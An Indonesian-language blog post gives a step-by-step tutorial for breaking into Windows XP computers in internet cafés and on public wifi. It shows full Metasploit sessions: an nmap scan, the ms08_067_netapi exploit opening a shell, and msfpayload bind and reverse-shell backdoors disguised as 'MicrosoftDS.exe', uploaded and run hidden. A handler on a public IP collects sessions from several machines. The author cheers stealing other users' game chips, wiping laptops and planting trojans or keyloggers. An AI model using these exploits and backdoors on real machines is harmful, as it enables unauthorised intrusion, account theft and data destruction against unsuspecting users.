kali ini saya akan memapaparkan tentang bagaimana cara kita menyusup ke komputer yang terinstall windows XP service pack 1 sampai dengan 3..
pastikan juga kalian mempunya DEEPFREEZE REMOVER untuk itu bisa kalian lihat di postingan saya sebelumnya.kenapa saya menganjurkan kalian mempunya deepfreeze remover, karena bisa saja warnet tempat kalian bermain di lock installation new softwarenya.
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:
1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.> sebagai sarana perkerjaan baru…ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa anda bayangkan kan…
kita bisa mengambil chips orang dengan mudah dan menjualNYa dengan senang hati….. karna AKUN ANDA ADA PADA KAMI …hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )… eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahuahuahuahahua…
2.> bagaimana caranya, ..hehehe AJAR DULUEE …hehhe pasti begitu TOoo… huahuahuahuahuahuahuahuahua….
so lanjut ke topik Utama….hiaaattt huattttCCiiiimmmss
1 2 3 4 5 6 7 8 | yang kita mesti sediakan adalah beberapa alat bantu , yang bisa anda dapatkan secara GRATIS...- OS BACKTRACK ( terserah Backtrack 3 Or 4 ) hehehehe- John the Ripper- pwdump6 ( http://www[dot]foofus[dot]net/fizzgig/pwdump/ )- TROJAN Buatan Sendiri atau keylogeer atau apalahhhh- kopi panas- pisang goreng atau Roti bakar ( Yang KEju Nahh )- ROKOK SAMPOERNA ^_^!!! huahuahua |
sekarang Kita mulai exploited memakai metasploit yang sudah include di backtrack
Untuk lebih memahami tentang Xploited , silahkan kunjungi http://www[dot]metasploit[dot]com/, karna saya tidak akan membahas bahasan Perintah yang akan kita gunakan
Pertama kita masuk dulu ke konsole( itueee Klo di windows namanYa CMD ) , nah klo sudah terbuka, ketik :
uing~BT#msfconsole
Untuk Melihat Lihat list exploits-nya , gunakan perintah :
1 2 3 4 5 6 7 8 | msf > show exploitswindows/smb/ms05_039_pnp Microsoft Plug and Play Service Overflowwindows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN Registry Overflowwindows/smb/ms06_025_rras Microsoft RRAS Service Overflowwindows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflowwindows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dllwindows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dllwindows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | msf > sudo nmap -v -sS -A -O 192.168.1.28[*] exec: sudo nmap -v -sS -A -O 192.168.1.28[sudo] password for test:Starting Nmap 4.62 ( http://nmap.org/ ) at 2009-03-21 23:50 CITInitiating ARP Ping Scan at 23:50Scanning 192.168.1.28 [1 port]Host 192.168.1.28 appears to be up ... good.Interesting ports on 192.168.1.28:Not shown: 1712 closed portsPORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds <------MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)Device type: general purposeRunning: Microsoft Windows XPOS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3Network Distance: 1 hopTCP Sequence Prediction: Difficulty=258 (Good luck!)IP ID Sequence Generation: IncrementalService Info: OS: Windows |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | msf > use windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) >Lihat opsi dari exploit ini dengan mengetikkan show options :msf exploit(ms08_067_netapi) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------RHOST yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Exploit target:Id Name-- ----0 Automatic Targeting |
1 2 | msf exploit(ms08_067_netapi) > set rhost 192.168.1.28rhost => 192.168.1.28 |
1 2 3 4 5 6 7 8 9 10 | msf exploit(ms08_067_netapi) > show targetsExploit targets:Id Name-- ----0 Automatic Targeting1 Windows 2000 Universal2 Windows XP SP0/SP1 Universal3 Windows XP SP2 English (NX)4 Windows XP SP3 English (NX)-------- cut ----------- |
1 2 | msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcppayloads => windows/shell_bind_tcp |
1 2 3 4 5 6 7 8 9 10 | msf exploit(ms08_067_netapi) > show payloadsCompatible payloads===================Name Description---- -----------generic/debug_trap Generic x86 Debug Trapgeneric/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support)generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager----------- dipotong sampai disini --------------- |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | msf exploit(ms08_067_netapi) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------RHOST 192.168.1.28 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options (windows/shell_bind_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique: seh, thread, processLPORT 4444 yes The local portRHOST 192.168.1.28 no The target addressExploit target:Id Name-- ----0 Automatic Targetingsekarang jalankan exploit :msf exploit(ms08_067_netapi) > exploit[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:English[*] Selected Target: Windows XP SP2 English (NX)[*] Triggering the vulnerability...[*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)Microsoft Windows XP [Version 5.1.2600]© Copyright 1985-2001 Microsoft Corp. |
nah untuk itu..anda harus mencari sendiri cara untuk mengistal trojan di komputerNya dan mendapatkan sesuatu yang anda inginkan…..
kan sa sudah kasihkan sampai penguasaan komputer….sekarang terserah anda.. ^_^ mat belajar yahh…..
Nah Saya Akan tambahkan lagi cara Menyusupkan Program Kekomputer target.
Menyusupkan file pada kompi orang……
pake metasploit”
sedikit tutorial .
Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp.
Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut.
1 2 3 4 5 | $ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exeCreated by msfpayload (http://www[dot]metasploit[dot]com).Payload: windows/meterpreter/bind_tcpLength: 307Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | msf exploit(ms08_067_netapi) > exploit[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English[*] Selected Target: Windows XP SP0/SP1 Universal[*] Triggering the vulnerability...[*] Transmitting intermediate stager for over-sized stage...(191 bytes)[*] Sending stage (2650 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (75787 bytes)...[*] Upload completed.[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)meterpreter > cd \meterpreter > pwdC:\meterpreter > upload MicrosoftDS.exe[*] uploading : MicrosoftDS.exe -> MicrosoftDS.exe[*] uploaded : MicrosoftDS.exe -> MicrosoftDS.exemeterpreter > execute -f MicrosoftDS.exe -HProcess 2348 created. |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcpmsf exploit(handler) > set LPORT 4321LPORT => 4321msf exploit(handler) > set RHOST 10.10.96.143RHOST => 10.10.96.143msf exploit(handler) > exploit[*] Starting the payload handler...[*] Started bind handler[*] Transmitting intermediate stager for over-sized stage...(191 bytes)[*] Sending stage (2650 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (75787 bytes)...[*] Upload completed.[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)meterpreter > |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC seh yes Exit technique: seh, thread, processLHOST yes The local addressLPORT 4444 yes The local portExploit target:Id Name-- ----0 Wildcard Targetmsf exploit(handler) > set LPORT 53LPORT => 53msf exploit(handler) > set LHOST 222.124.199.76LHOST => 222.124.199.76msf exploit(handler) > set ExitOnSession falsemsf exploit(handler) > exploit[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Starting the payload handler... |
1 2 3 4 5 6 7 | $ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exeCreated by msfpayload (http://www.metasploit.com).Payload: windows/meterpreter/reverse_tcpLength: 278Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread$ file MicrosoftDS.exeMicrosoftDS.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit |
1 2 3 4 5 6 7 8 9 10 11 | [*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Starting the payload handler...[*] Transmitting intermediate stager for over-sized stage...(191 bytes)[*] Sending stage (2650 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (75787 bytes)...[*] Upload completed.[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)meterpreter > |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | msf exploit(handler) > sessions -lActive sessions===============Id Description Tunnel-- ----------- ------3 Meterpreter 222.124.199.76:53 -> 10.10.96.146:48314 Meterpreter 222.124.199.76:53 -> 10.10.96.223:48365 Meterpreter 222.124.199.76:53 -> 10.10.96.215:48386 Meterpreter 222.124.199.76:53 -> 172.16.96.143:48407 Meterpreter 222.124.199.76:53 -> 172.16.96.143:48458 Meterpreter 222.124.199.76:53 -> 172.16.96.143:48469 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4847msf exploit(handler) > sessions -i 3[*] Starting interaction with 3...meterpreter > sysinfoComputer: PROGWAROS : Windows XP (Build 2600, ). |
bisa juga di gunakan untuk eksekusi dan upload file,,
kreasiin ya
Nah Untuk Tools Pendukungnya Silahkan sedot Disini , saya lengkapi juga dengan Video Tutorialnya :

Metasploit Framework Console
Backdoring Tools
Untuk Scan IP Range dan Port 445

No comments:
Post a Comment